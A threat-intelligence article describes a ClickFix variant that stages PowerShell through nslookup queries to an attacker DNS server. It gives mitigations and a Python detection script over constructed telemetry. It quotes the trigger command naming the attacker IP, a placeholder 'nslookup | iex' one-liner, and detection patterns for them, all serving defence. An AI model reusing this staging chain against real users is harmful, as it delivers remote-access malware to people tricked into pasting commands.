Attackers Turn DNS Into Malware Channel in Latest ClickFix Variant

ClickFix, a social-engineering malware delivery tactic, has evolved once again. In a newly observed campaign, threat actors are leveraging DNS lookups via the Windows nslookup utility to fetch and execute malicious PowerShell code, making DNS a lightweight staging channel for malware distribution. The server that answers the lookup is attacker-controlled, not the victim's normal resolver; this is one of the first known cases of a DNS response being used to deliver a live payload as part of a ClickFix workflow.


What is ClickFix?

The ClickFix technique is a social-engineering pattern in which users are tricked into manually typing or pasting commands that ultimately lead to malware execution. Traditionally, attackers employ:

  • Phishing or malvertising redirects
  • Fake CAPTCHA or “system error/fix” lures
  • Browser or window prompts disguised as legitimate UI

Once the victim follows the on-screen instructions, they are led to paste or run a command in the Run dialog, cmd.exe or PowerShell, which then retrieves and executes malicious code.


The DNS Twist: From HTTP to nslookup

In this new variant, attackers are taking advantage of DNS rather than conventional web channels to stage malware. This approach involves the following key elements:

  1. Malicious Lure: The victim is guided by a convincing on-screen prompt (e.g., “Fix your system error”) to run a command.
  2. Custom DNS Server: Instead of using the system’s configured resolver, the command hard-codes the attacker’s DNS server as nslookup’s server argument, so the query never passes through the organisation’s own resolvers.
  3. nslookup Trick: The nslookup command contacts the attacker-controlled DNS server and retrieves a response containing a PowerShell payload.

The DNS reply carries a PowerShell command string where a hostname would normally be, so it appears on the “Name:” line of nslookup’s output. The pasted command filters that line out of the output and executes it on the victim’s host to kick off the next stage of the attack.

By using DNS for staging, attackers benefit in two key ways:

  • Stealth and evasion: DNS traffic is routinely treated as benign and allowed across networks, reducing detection likelihood. The caveat for defenders is that this variant does not use the normal resolver path at all: the endpoint sends a query straight to an external IP on port 53, which is exactly what an egress rule restricting port 53 to approved resolvers blocks.
  • Blending with normal traffic: Unlike HTTP/HTTPS pulls that show up in firewall or proxy logs, a direct query to an external DNS server bypasses the corporate resolver entirely, so it leaves no trace in internal DNS server logs; only endpoint telemetry or firewall flow logs will see it.

Technical Breakdown of the Attack Chain

Here is a simplified breakdown of how this DNS-based ClickFix attack unfolds:

  1. Initial Lure:
    The victim reaches a compromised or fake page that instructs them to run a command via Windows Run or cmd.exe.
  2. nslookup Execution:
    A command such as: nslookup example.com 84.21.189.20 is executed. nslookup treats its second positional argument as the server to query, so here 84.21.189.20 is a malicious DNS server controlled by the attacker and the hostname is merely a trigger for the lookup.
  3. Payload Delivery via DNS:
    The DNS server responds with an answer whose name field is the PowerShell command, which nslookup prints on its “Name: …” line. The pasted command filters that line out of the nslookup output and executes it as PowerShell.
  4. Secondary Payload Fetch:
    This command fetches additional components — such as ZIP archives — from attacker infrastructure.
  5. Final Malware Execution:
    Extracted scripts and executables ultimately launch a remote access trojan (e.g., ModeloRAT), giving the adversary remote control of the host.

Why This Matters

1. DNS as a Covert Delivery Channel

Carrying a payload stage over DNS is not new in itself (malware has pulled PowerShell out of DNS TXT records for years), but pairing it with a ClickFix lure is, and it bypasses many traditional perimeter defenses. Firewalls and IDS/IPS often focus on HTTP/HTTPS and other protocols, while DNS is treated as routine infrastructure traffic. The result: malicious content may pass under the radar.

2. Increased Evasion Against Endpoint Controls

The first-stage fetch is performed by a signed, ubiquitous OS utility (nslookup) rather than by PowerShell’s own web cmdlets, so detections keyed on Invoke-WebRequest, DownloadString or known C2 URLs do not fire until the secondary payload is requested. Endpoint detections need to look instead at the process chain: a console or Run-dialog child spawning nslookup with an IP literal as its server argument, and its output being fed back into a command evaluator.

3. Rapid Iteration of Social Engineering Techniques

ClickFix continues to evolve. Earlier variants used fake Windows Update animations, application prompts, or window glitches to convince users to run dangerous commands. This DNS-based variation adds another layer of sophistication.


Mitigations and Detection

To defend against this class of attack, organisations should consider:

  • Endpoint Security Controls: Constrain PowerShell and script execution for ordinary users (AppLocker or WDAC policies, PowerShell Constrained Language Mode), enable command-line auditing (Sysmon Event ID 1 or Windows 4688) and PowerShell script block logging, and alert on nslookup.exe invoked with an IP-literal server argument or on cmd.exe/powershell.exe command lines that combine nslookup with an evaluator such as Invoke-Expression. Where users do not need it, the Run dialog can be disabled by Group Policy.
  • DNS Logging & Analysis: Log on the resolvers, but also watch endpoint and firewall telemetry for DNS traffic (UDP/TCP 53) to any destination other than the approved resolvers; a direct query to an external IP is the signature of this variant and will never appear in internal resolver logs.
  • User Awareness Training: Educate users never to execute unfamiliar commands in the Run dialog or system consoles, especially when instructed to by a web page, CAPTCHA or error prompt.
  • Egress Filtering: Allow outbound port 53 only from the organisation’s own resolvers and block endpoints from reaching external DNS servers directly, so a hard-coded server such as the one above simply times out.
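The process-chain and resolver-bypass checks described in the attack chain above and in the mitigation list can be expressed as a small detection pass over process-creation and network-connection telemetry. The following is an added example written for this page, not code from the campaign or from any vendor: it runs over constructed Sysmon-style records, assumes a hypothetical resolver allow-list (10.0.0.53 and 10.0.1.53), and reuses only the 84.21.189.20 address quoted in the article. The placeholder command line in the sample is deliberately non-functional.

```python
"""Heuristic detections for the nslookup-based ClickFix stage.

Added example for this article; assumes a hypothetical resolver allow-list
and runs over constructed Sysmon-style records, not real campaign telemetry.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional

# Hypothetical allow-list for this environment; any other port-53 destination is suspect.
APPROVED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}

# Parents from which a user pastes a ClickFix command (the Run dialog launches via explorer.exe).
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe"}

IPV4 = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")
# Constructs that feed captured output back into a command interpreter.
EVALUATOR = re.compile(r"\biex\b|invoke-expression|for /f", re.IGNORECASE)


@dataclass
class ProcessEvent:
    """Subset of a Sysmon Event ID 1 (process creation) record."""
    image: str
    parent_image: str
    command_line: str


@dataclass
class NetworkEvent:
    """Subset of a Sysmon Event ID 3 (network connection) record."""
    image: str
    dest_ip: str
    dest_port: int


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def foreign_resolvers(command_line: str) -> List[str]:
    """IPv4 literals on the command line that are not approved resolvers.

    nslookup takes the server as its second positional argument, so an IP
    literal on an nslookup command line is a resolver choice, not a lookup target.
    """
    found = []
    for tok in IPV4.findall(command_line):
        try:
            ip = str(ipaddress.ip_address(tok))
        except ValueError:
            continue  # e.g. 999.1.1.1 is not an address
        if ip not in APPROVED_RESOLVERS:
            found.append(ip)
    return found


def check_process(ev: ProcessEvent) -> Optional[str]:
    """Return an alert string if the event matches the ClickFix pattern, else None."""
    image, parent = basename(ev.image), basename(ev.parent_image)
    if image == "nslookup.exe":
        bad = foreign_resolvers(ev.command_line)
        if bad:
            via = " from interactive shell" if parent in INTERACTIVE_PARENTS else ""
            return f"nslookup directed at non-approved resolver {bad[0]}{via}"
        return None
    if image in ("powershell.exe", "pwsh.exe", "cmd.exe"):
        cl = ev.command_line.lower()
        if "nslookup" in cl and EVALUATOR.search(cl):
            return "shell one-liner feeds nslookup output into a command evaluator"
    return None


def check_network(ev: NetworkEvent) -> Optional[str]:
    """Flag DNS traffic that bypasses the approved resolvers."""
    if ev.dest_port != 53 or ev.dest_ip in APPROVED_RESOLVERS:
        return None
    return f"{basename(ev.image)} sent DNS to non-approved resolver {ev.dest_ip}"


def run_detections(procs: List[ProcessEvent], conns: List[NetworkEvent]) -> List[str]:
    alerts = [a for a in map(check_process, procs) if a]
    alerts += [a for a in map(check_network, conns) if a]
    return alerts


# Constructed sample telemetry (not captured from the campaign).
SAMPLE_PROCS = [
    ProcessEvent(r"C:\Windows\System32\nslookup.exe", r"C:\Windows\System32\cmd.exe",
                 "nslookup example.com 84.21.189.20"),
    ProcessEvent(r"C:\Windows\System32\nslookup.exe", r"C:\Windows\System32\cmd.exe",
                 "nslookup fileserver.corp.local 10.0.0.53"),
    ProcessEvent(r"C:\Windows\System32\nslookup.exe", r"C:\Windows\System32\cmd.exe",
                 "nslookup www.example.org"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\explorer.exe",
                 'powershell -nop -w hidden -c "<filter nslookup x 84.21.189.20 output> | iex"'),
]
SAMPLE_CONNS = [
    NetworkEvent(r"C:\Windows\System32\nslookup.exe", "84.21.189.20", 53),
    NetworkEvent(r"C:\Windows\System32\svchost.exe", "10.0.0.53", 53),
    NetworkEvent(r"C:\Program Files\Browser\browser.exe", "84.21.189.20", 443),
]

if __name__ == "__main__":
    for alert in run_detections(SAMPLE_PROCS, SAMPLE_CONNS):
        print(alert)
```

Administrators do legitimately run nslookup against a specific server, so the process check is a hunting heuristic to be tuned with the allow-list rather than a blocking rule; the network check, by contrast, is a firm policy violation wherever port-53 egress is restricted to the approved resolvers, and is the one to alert on first.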

Conclusion

The newly disclosed ClickFix variant highlights a concerning trend: adversaries are innovating rapidly around social engineering and abuse of common system tools. By turning DNS into a viable channel for payload staging, attackers can dodge conventional detections and blend malicious activity into normal network behavior. This underscores the need for defense-in-depth security controls, rigorous monitoring of DNS behavior, and continuous user education to recognize and avoid social-engineering traps.